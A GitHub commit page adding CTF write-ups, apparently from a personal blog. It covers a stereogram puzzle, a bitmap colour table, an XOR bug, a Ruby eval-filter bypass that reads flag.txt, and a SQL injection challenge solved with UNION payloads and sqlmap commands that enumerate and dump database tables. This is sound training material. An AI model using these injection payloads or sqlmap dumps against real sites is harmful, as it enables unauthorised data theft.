Skip to content

Commit

Permalink
I finally wrote a writeup yay
Browse files Browse the repository at this point in the history
  • Loading branch information
@javadhamidi
javadhamidi committed Aug 11, 2023
1 parent 63c7030 commit db013e1
Show file tree
Hide file tree
Showing 5 changed files with 158 additions and 11 deletions.
10 changes: 5 additions & 5 deletions content/posts/2022/uactf/blurry-eyed.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -10,14 +10,14 @@ categories:
- misc
---

Based on the description, you may have determined that we are dealing with an [autostereogram](https://en.wikipedia.org/wiki/Autostereogram), better known as a [magic eye](https://en.wikipedia.org/wiki/Magic_Eye) puzzle. As such, theoretically you can just stare at the picture with great intensity until the flag reveals itself to you. If you did manage to solve this challenge only with your eyes then you are amazing. Discerning simple shapes are difficult, let alone a short sentence.
Based on the description, you may have determined that we are dealing with an [autostereogram](https://en.wikipedia.org/wiki/Autostereogram), better known as a [magic eye](https://en.wikipedia.org/wiki/Magic_Eye) puzzle. As such, you can theoretically just stare at the picture with great intensity until the flag reveals itself to you. If you did manage to solve this challenge with only your eyes then you are amazing. Discerning simple shapes is difficult, let alone a short sentence.

If you are a mere mortal, an alternative way to solve this challenge is to use any number of the online sterogram solving tools that exist ([this one's](http://magiceye.ecksdee.co.uk/) pretty good). Alternatively you can open up GIMP and put the image on two layers. Then set the blending mode of the top layer to 'difference' and drag the top layer along the horizontal axis until you get something like this:
If you are a mere mortal, an alternative way to solve this challenge is to use any of the online stereogram-solving tools that exist ([this one's](http://magiceye.ecksdee.co.uk/) pretty good). Alternatively, you can open up GIMP and put the image on two layers. Then set the blending mode of the top layer to 'difference' and drag the top layer along the horizontal axis until you get something like this:

![Gimp Decoded Image](decoded.png)
![Gimp Decoded Image](./assets/decoded.png)

Regardless of what solution you use, the shape of the letters should bear resemblance to the original image, shown below.
Regardless of what solution you use, the shape of the letters should bear a resemblance to the original image, shown below.

![Original Text](original.png)
![Original Text](./assets/original.png)

**Flag:** `UACTF{r34l17y_1n_3d}`
8 changes: 4 additions & 4 deletions content/posts/2022/uactf/colour-blind.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -10,13 +10,13 @@ categories:
- forensics
---

While running the image through stegsolve/stegonline or manipulating the pixels in your favourite image editor won't work, a hex editor should show you that the data portion of the bitmap contains more than two distinct hex values. Checking the image properties should also indicate that `ishihara.bmp` is a 16 color bitmap image, and as such, each individual hex value denotes a different colour. Hence, we know that the image contains a wider range colours than are being shown. To figure out why we can't see them, let's explore the [bitmap file format](https://en.wikipedia.org/wiki/BMP_file_format) a bit further by annotating the raw bytes of our challenge file. Note that the bytes highlighted in grey below denote the data portion of the file.
While running the image through stegsolve/stegonline or manipulating the pixels in your favourite image editor won't work, a hex editor should show you that the data portion of the bitmap contains more than two distinct hex values. Checking the image properties should also indicate that `ishihara.bmp` is a 16-color bitmap image, and as such, each hex value denotes a different colour. Hence, we know that the image contains a wider range of colours than are being shown. To figure out why we can't see them, let's explore the [bitmap file format](https://en.wikipedia.org/wiki/BMP_file_format) a bit further by annotating the raw bytes of our challenge file. Note that the bytes highlighted in grey below denote the data portion of the file.

![Annotated Bitmap Header](bitmap_hex_annotated.png)
![Annotated Bitmap Header](./assets/bitmap_hex_annotated.png)

The challenge description and title are collectively intended to hint at checking the bitmap image file's 'color table'. Indeed, if we look at the bytes of the file above, you might notice that 15 of the 16 colours in our colour table have the same value. Altering these values to make them more distinct (hint: these are just typical hex colours in little-endian). That said, there are a lot of paths to figuring out this challenge, and one of the easiest is to simply transplant the header of a working 16 color bitmap onto the challenge file. If you do you'll probably get something close to the original, which is included below:
The challenge description and title are collectively intended to hint at checking the bitmap image file's 'color table'. Indeed, if we look at the bytes of the file above, you might notice that 15 of the 16 colours in our colour table have the same value. Altering these values to make them more distinct (hint: these are just typical hex colours in little-endian). That said, there are a lot of paths to figuring out this challenge, and one of the easiest is to simply transplant the header of a working 16-color bitmap onto the challenge file. If you do you'll probably get something close to the original, which is included below:

![Original Image](original.bmp)
![Original Image](./assets/original.bmp)

Thanks to Francisco Couzo for the use of their [Ishihara Plate Generator](https://franciscouzo.github.io/ishihara/).

Expand Down
37 changes: 37 additions & 0 deletions content/posts/2022/uactf/evil-eval.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,37 @@
---
layout: post
title: Evil Eval - UACTF 2022
date: 2022-08-07T00:00:00.000Z
description: Made a cool internet calculator for all your maths needs. Well, some of your maths needs.
author: javad
categories:
- ctf
- write-ups
- pwn
---

Trying a variety of inputs over netcat, you'll quickly discover two key pieces of information from the error messages:

1. The characters 'f', 'l', 'a', 'g', '.', 't', 'x', 't', and '`' are all blocked
2. Our input can't have more than eight distinct characters

We can infer that our goal is something to the effect of making a system call like `cat flag.txt` in eight or fewer characters. Looking through [Ruby's pre-defined variables](https://ruby-doc.org/docs/ruby-doc-bundle/Manual/man-1.4/variable.html), we can see that `$"` denotes a long list of module names (loaded by require) which we can potentially character index and frankenstein together to write out "flag.txt" in relatively few distinct characters, like so:

```
f -> $"[11+1+1+1][11+11+11]
l -> $"[1+1+1][1+1+1+1]
a -> $"[1+1][1]
g -> $"[11][11+11+1+1]
. -> $"[1][1+1+1+1+1+1]
t -> $"[1+1][1+1]
x -> $"[1+1+1][1+1+1+1+1+1]
t -> $"[1+1][1+1]
```

The next step is to get Ruby to print the contents of this file. One trick is to pass `ARGV << flag.txt`, which will cause our ruby script to call itself, passing the evaluated contents of `flag.txt` to itself, exposing the flag. Of course, this requires two many distinct characters, but by referring back to our trusty pre-defined variables, we see that the much shorter `$*` is an alias to `ARGV`. Putting all this information, we can create the following 'payload' to expose the flag:

```
$*<<$"[11+1+1+1][11+11+11]+$"[1+1+1][1+1+1+1]+$"[1+1][1]+$"[11][11+11+1+1]+$"[1][1+1+1+1+1+1]+$"[1+1][1+1]+$"[1+1+1][1+1+1+1+1+1]+$"[1+1][1+1]
```

**Flag:** `UACTF{8u7_53210u51y_d0n7_3v41}`
4 changes: 2 additions & 2 deletions content/posts/2022/uactf/nontextual-troubles.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -10,7 +10,7 @@ categories:
- crypto
---

It turn out that in Python 3, attempting to write non-ASCII characters to a file without using 'binary mode' (a mode which deals with 'non-textual data', hence the name of the challenge) has some less-than ideal results. Indeed, if you tried providing your own plain-text to `xor.py` you might have noticed that there are somehow more bytes in the cipher-text after XORing that you started with in your plaintext. Ultimately, it appears that the `write.write(ciphertext)` function is prepending either 0xc2 or 0xc3 to certain bytes. Simply adding a condition to exclude these, and providing the cipher-text as the input (since XOR is the inverse of itself) will provide a simple solution to this puzzle.
It turns out that in Python 3, attempting to write non-ASCII characters to a file without using 'binary mode' (a mode which deals with 'non-textual data', hence the name of the challenge) has some less-than-ideal results. Indeed, if you tried providing your plain text to `xor.py` you might have noticed that there are somehow more bytes in the cypher-text after XORing that you started with in your plaintext. Ultimately, it appears that the `write.write(ciphertext)` function is prepending either 0xc2 or 0xc3 to certain bytes. Simply adding a condition to exclude these, and providing the cipher-text as the input (since XOR is the inverse of itself) will provide a simple solution to this puzzle.

```py
from random import seed, randrange
Expand All @@ -30,4 +30,4 @@ with open("plaintext.txt", 'r') as read, open("ciphertext.txt", 'w') as write:
write.write(ciphertext)
```

**Flag**: `UACTF{b4d_h4b175_l34d_70_py7h0n2}`
**Flag**: `UACTF{b4d_h4b175_l34d_70_py7h0n2}`
110 changes: 110 additions & 0 deletions content/posts/2023/duckctf/magic-beans.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,110 @@
---
layout: post
title: Magic Beans - DuckCTF 2023
date: 2023-08-11T00:00:00.000Z
description: Hidden beneath this strange jelly bean themed website is a flag; a flag hidden within a table aptly named Flag, and sprinkled letter-by-letter along single character columns titled 'a', 'b', 'c', 'd', ...
author: javad
categories:
- ctf
- write-ups
- web
---

We're presented with a largely static, single-page site - save for one input field that doesn't seem to be processed on the client side. The challenge description also draws special attention to 'columns' and 'tables'. Given that there aren't any HTML tables in the source, instinct says this might involve a database.

If we try a classic single-quote injection (`'`) we see the quote suspiciously disappear. Adding on both a semi-colon to terminate the SQL statement and a comment afterwards (`'; -- `) we see that vanish as well! Clearly, the backend is handling this input differently from regular text.

We know from the challenge description that we need to read from a table called Flag (in the database). A good way is to tack this on to the input we're already getting (all the delicious beans) using a UNION attack. This is where some googling and trial-and-error comes in to craft just the right payload. Here's what we came up with:

```sql
' UNION ALL SELECT a, b, c, d, e FROM Flag; --
```
Be aware that there is some **input validation on the client side**! Submitting certain characters or too many characters may not work. Instead, try making the POST request using a tool like [Insomnia](https://insomnia.rest/) or [Postman](https://www.postman.com/).
Some notable observations about this payload:
- Make sure to have a space after the comment (` -- `), injection is finicky.
- We use `UNION ALL SELECT` instead of `UNION SELECT`, just to make sure that no duplicate rows are removed (although that's unlikely in this situation).
- We know which columns and tables to we want thanks to info from the challenge description.
- We only select five columns (`a, b, c, d, e`), since a `UNION SELECT` will only work if the number of columns appended matches the number we're already getting. Any more or any less will give us 'No results found.' indicating our payload failed.
A good way to figure out the number of columns we need to `UNION SELECT` is to test each of the following statements, one at a time, until one works. One of these statements should succeed, even if we don't know the names of the columns/table.

```
' UNION ALL SELECT NULL --
' UNION ALL SELECT NULL,NULL --
' UNION ALL SELECT NULL,NULL,NULL --
' UNION ALL SELECT NULL,NULL,NULL,NULL --
' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL --
...
```
Our functioning payload from before should give us a new bean entry at the very bottom, with the letters 'u', 'a', 'c', visible (part of the flag format `quack{}`). Nice! Rotating through the alphabet of course could give us the flag, but that seems rather tedious. Instead, we can concatenate all the columns in the table Flag in a payload like this:
```sql
~' UNION ALL SELECT NULL, CONCAT(a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w), NULL, NULL, NULL FROM Flag; --
```

Some trial-and-error tells us that columns a-w are valid. Substituting the concatenated columns into the second union-selected column instead of the first will show the flag where the bean name would usually be (in nice big letters). Adding a tilde at the beginning (`~`) is just to clear out all other search results (since none of the bean names includes a `~`).

**Flag**: `quack{J3lly_83lly_ru5H}`

## Using sqlmap

While we can totally craft our own payloads, using an automated tool can be far easier. [Sqlmap](https://sqlmap.org/) is awesome, and allows us to solve this challenge without any of the hints given in the challenge description.

Let's take this from the top. First, let's check if injection is possible. The following command specifies the URL, the form data (which is one search parameter), and states that we are making a POST request.

```
sqlmap -u "http://chall.duckctf.com:8080/index.php" --data "search=*" -p "search" --method POST
```

The output tells us injection is possible! We can now add on `--dbs` to get the names of all databases.

```bash
sqlmap -u "http://chall.duckctf.com:8080/index.php" --data "search=*" -p "search" --method POST --dbs
```
```
...
available databases [2]:
[*] beantome
[*] information_schema
```

Other than the usual 'information_schema', 'beantome' is the only database of interest. Let's see what tables are inside ...

```bash
sqlmap -u "http://chall.duckctf.com:8080/index.php" --data "search=*" -p "search" --method POST --tables -D beantome
```
```
...
Database: beantome
[2 tables]
+-------+
| Beans |
| Flag |
+-------+
```

Hmm, two interesting tables. I'm guessing that all our delicious bean flavours are inside 'Beans' so let's turn our attention and dump the contents of 'Flag'.

```bash
sqlmap -u "http://chall.duckctf.com:8080/index.php" --data "search=*" -p "search" --method POST --dump -T Flag -D beantome
```
```
...
Database: beantome
Table: Flag
[1 entry]
+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
| a | b | c | d | e | f | g | h | i | j | k | l | m | n | o | p | q | r | s | t | u | v | w |
+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
| q | u | a | c | k | { | J | 3 | l | l | y | _ | 8 | 3 | l | l | y | _ | r | u | 5 | H | } |
+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
```

**Flag**: `quack{J3lly_83lly_ru5H}`

0 comments on commit db013e1

Please sign in to comment.